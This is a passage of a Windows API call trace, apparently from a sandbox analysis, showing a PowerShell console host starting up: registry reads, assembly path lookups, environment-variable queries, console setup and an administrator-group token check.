0x3220d0 [0230.163] VerLanguageNameW (in: wLang=0x0, szLang=0x3220d0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0230.163] CoTaskMemFree (pv=0x3220d0) [0230.163] VerQueryValueW (in: pBlock=0x2ea6350, lpSubBlock="\\", lplpBuffer=0x16d7d8, puLen=0x16d7d0 | out: lplpBuffer=0x16d7d8*=0x2ea6378, puLen=0x16d7d0) returned 1 [0230.176] CoTaskMemAlloc (cb=0x104) returned 0x343650 [0230.176] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343650, nSize=0x80 | out: lpBuffer="") returned 0x0 [0230.177] CoTaskMemFree (pv=0x343650) [0230.185] CoTaskMemAlloc (cb=0x104) returned 0x343650 [0230.185] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343650, nSize=0x80 | out: lpBuffer="") returned 0x0 [0230.185] CoTaskMemFree (pv=0x343650) [0230.188] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6a8 | out: phkResult=0x16d6a8*=0x308) returned 0x0 [0230.189] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d66c, lpData=0x0, lpcbData=0x16d668*=0x0 | out: lpType=0x16d66c*=0x1, lpData=0x0, lpcbData=0x16d668*=0x56) returned 0x0 [0230.190] CoTaskMemAlloc (cb=0x5a) returned 0x379c60 [0230.190] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d63c, lpData=0x379c60, lpcbData=0x16d638*=0x56 | out: lpType=0x16d63c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d638*=0x56) returned 0x0 [0230.190] CoTaskMemFree (pv=0x379c60) [0230.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0230.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0230.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0230.248] CoTaskMemAlloc (cb=0x104) returned 0x343650 [0230.248] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343650, nSize=0x80 | out: lpBuffer="") returned 0x0 [0230.248] CoTaskMemFree (pv=0x343650) [0232.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0232.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0233.598] CoTaskMemAlloc (cb=0x104) returned 0x343760 [0233.599] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343760, nSize=0x80 | out: lpBuffer="") returned 0x0 [0233.599] CoTaskMemFree (pv=0x343760) [0233.600] CoTaskMemAlloc (cb=0x104) returned 0x343760 [0233.600] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343760, nSize=0x80 | out: lpBuffer="") returned 0x0 [0233.600] CoTaskMemFree (pv=0x343760) [0233.706] CoTaskMemAlloc (cb=0x104) returned 0x343760 [0233.706] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343760, nSize=0x80 | out: lpBuffer="") returned 0x0 [0233.706] CoTaskMemFree (pv=0x343760) [0233.719] CoTaskMemAlloc (cb=0x104) returned 0x343760 [0233.719] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343760, nSize=0x80 | out: lpBuffer="") returned 0x0 [0233.720] CoTaskMemFree (pv=0x343760) [0233.720] CoTaskMemAlloc (cb=0x104) returned 0x343760 [0233.721] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343760, nSize=0x80 | out: lpBuffer="") returned 0x0 [0233.721] CoTaskMemFree (pv=0x343760) [0234.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x16d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0234.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x16d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0234.548] CoTaskMemAlloc (cb=0x104) returned 0x343760 [0234.548] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343760, nSize=0x80 | out: lpBuffer="") returned 0x0 [0234.548] CoTaskMemFree (pv=0x343760) [0234.562] CoTaskMemAlloc (cb=0x104) returned 0x343760 [0234.562] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343760, nSize=0x80 | out: lpBuffer="") returned 0x0 [0234.562] CoTaskMemFree (pv=0x343760) [0234.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0234.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0236.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x16d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0236.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x16d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0236.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x16d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0236.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x16d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0237.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0237.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0237.685] CoTaskMemAlloc (cb=0x104) returned 0x343980 [0237.685] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343980, nSize=0x80 | out: lpBuffer="") returned 0x0 [0237.685] CoTaskMemFree (pv=0x343980) [0237.847] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x16d600 | out: lpFileInformation=0x16d600*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0237.847] SetErrorMode (uMode=0x1) returned 0x1 [0243.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0243.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0243.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0243.328] CoTaskMemAlloc (cb=0x104) returned 0x343980 [0243.328] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343980, nSize=0x80 | out: lpBuffer="") returned 0x0 [0243.328] CoTaskMemFree (pv=0x343980) [0243.346] CoTaskMemAlloc (cb=0x104) returned 0x343980 [0243.346] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343980, nSize=0x80 | out: lpBuffer="") returned 0x0 [0243.346] CoTaskMemFree (pv=0x343980) [0243.346] CoTaskMemAlloc (cb=0x104) returned 0x343980 [0243.346] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343980, nSize=0x80 | out: lpBuffer="") returned 0x0 [0243.346] CoTaskMemFree (pv=0x343980) [0243.379] CoCreateGuid (in: pguid=0x16d9c8 | out: pguid=0x16d9c8*(Data1=0xa4e0a750, Data2=0xeca3, Data3=0x47ce, Data4=([0]=0xb1, [1]=0xa0, [2]=0x9e, [3]=0xfd, [4]=0xb8, [5]=0x4a, [6]=0x87, [7]=0x82))) returned 0x0 [0244.119] CoTaskMemAlloc (cb=0x104) returned 0x343980 [0244.119] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343980, nSize=0x80 | out: lpBuffer="") returned 0x0 [0244.119] CoTaskMemFree (pv=0x343980) [0244.123] CoTaskMemAlloc (cb=0x104) returned 0x343980 [0244.123] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343980, nSize=0x80 | out: lpBuffer="") returned 0x0 [0244.123] CoTaskMemFree (pv=0x343980) [0244.245] CoTaskMemAlloc (cb=0x104) returned 0x343980 [0244.245] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343980, nSize=0x80 | out: lpBuffer="") returned 0x0 [0244.245] CoTaskMemFree (pv=0x343980) [0244.252] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0244.255] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x16d670 | out: lpConsoleScreenBufferInfo=0x16d670) returned 1 [0244.261] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0244.261] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x16d670 | out: lpConsoleScreenBufferInfo=0x16d670) returned 1 [0244.262] GetVersionExW (in: lpVersionInformation=0x16d600*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16d600*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0244.265] GetCurrentProcess () returned 0xffffffffffffffff [0244.266] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x16d698 | out: TokenHandle=0x16d698*=0x324) returned 1 [0244.271] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16d5b8 | out: TokenInformation=0x0, ReturnLength=0x16d5b8) returned 0 [0244.272] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2e33a0 [0244.272] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x2e33a0, TokenInformationLength=0x4, ReturnLength=0x16d5b8 | out: TokenInformation=0x2e33a0, ReturnLength=0x16d5b8) returned 1 [0244.273] DuplicateTokenEx (in: hExistingToken=0x324, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x16d718 | out: phNewToken=0x16d718*=0x320) returned 1 [0244.273] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16d5b8 | out: TokenInformation=0x0, ReturnLength=0x16d5b8) returned 0 [0244.274] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2e33d0 [0244.274] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x2e33d0, TokenInformationLength=0x4, ReturnLength=0x16d5b8 | out: TokenInformation=0x2e33d0, ReturnLength=0x16d5b8) returned 1 [0244.274] CheckTokenMembership (in: TokenHandle=0x320, SidToCheck=0x2f810f8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x16d728 | out: IsMember=0x16d728) returned 1 [0244.275] CloseHandle (hObject=0x320) returned 1 [0244.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0244.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0244.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0244.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0244.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0244.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0244.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0244.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0244.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0244.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0244.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0244.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0244.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0244.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0245.600] SetConsoleCtrlHandler (HandlerRoutine=0x29c677c, Add=1) returned 1 [0246.448] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x320 [0246.645] CoCreateGuid (in: pguid=0x16d810 | out: pguid=0x16d810*(Data1=0x650312b7, Data2=0x2464, Data3=0x4c0d, Data4=([0]=0xb6, [1]=0xb5, [2]=0x40, [3]=0x29, [4]=0x71, [5]=0x32, [6]=0xb9, [7]=0x5e))) returned 0x0 [0246.677] CoTaskMemAlloc (cb=0x104) returned 0x343980 [0246.677] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343980, nSize=0x80 | out: lpBuffer="") returned 0x0 [0246.677] CoTaskMemFree (pv=0x343980) [0246.748] WinSqmIsOptedIn () returned 0x0 [0246.750] CoTaskMemAlloc (cb=0x104) returned 0x343980 [0246.750] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343980, nSize=0x80 | out: lpBuffer="") returned 0x0 [0246.751] CoTaskMemFree (pv=0x343980) [0246.755] CoTaskMemAlloc (cb=0x104) returned 0x343980 [0246.755] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343980, nSize=0x80 | out: lpBuffer="") returned 0x0 [0246.756] CoTaskMemFree (pv=0x343980) [0246.758] CoTaskMemAlloc (cb=0x104) returned 0x343980 [0246.758] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343980, nSize=0x80 | out: lpBuffer="") returned 0x0 [0246.759] CoTaskMemFree (pv=0x343980) [0246.820] CoTaskMemAlloc (cb=0x104) returned 0x343980 [0246.820] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343980, nSize=0x80 | out: lpBuffer="") returned 0x0 [0246.821] CoTaskMemFree (pv=0x343980) [0246.824] CoTaskMemAlloc (cb=0x104) returned 0x343980 [0246.824] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343980, nSize=0x80 | out: lpBuffer="") returned 0x0 [0246.824] CoTaskMemFree (pv=0x343980) [0246.832] CoTaskMemAlloc (cb=0x104) returned 0x343980 [0246.832] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343980, nSize=0x80 | out: lpBuffer="") returned 0x0 [0246.833] CoTaskMemFree (pv=0x343980) [0246.834] CoTaskMemAlloc (cb=0x104) returned 0x343980 [0246.835] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343980, nSize=0x80 | out: lpBuffer="") returned 0x0 [0246.835] CoTaskMemFree (pv=0x343980) [0246.837] CoTaskMemAlloc (cb=0x104) returned 0x343980 [0246.837] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343980, nSize=0x80 | out: lpBuffer="") returned 0x0 [0246.838] CoTaskMemFree (pv=0x343980) [0246.841] CoTaskMemAlloc (cb=0x104) returned 0x343980 [0246.841] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343980, nSize=0x80 | out: lpBuffer="") returned 0x0 [0246.841] CoTaskMemFree (pv=0x343980) [0246.852] CoTaskMemAlloc (cb=0x104) returned 0x343980 [0246.852] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343980, nSize=0x80 | out: lpBuffer="") returned 0x0 [0246.852] CoTaskMemFree (pv=0x343980) [0246.856] CoTaskMemAlloc (cb=0x104) returned 0x343980 [0246.856] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343980, nSize=0x80 | out: lpBuffer="") returned 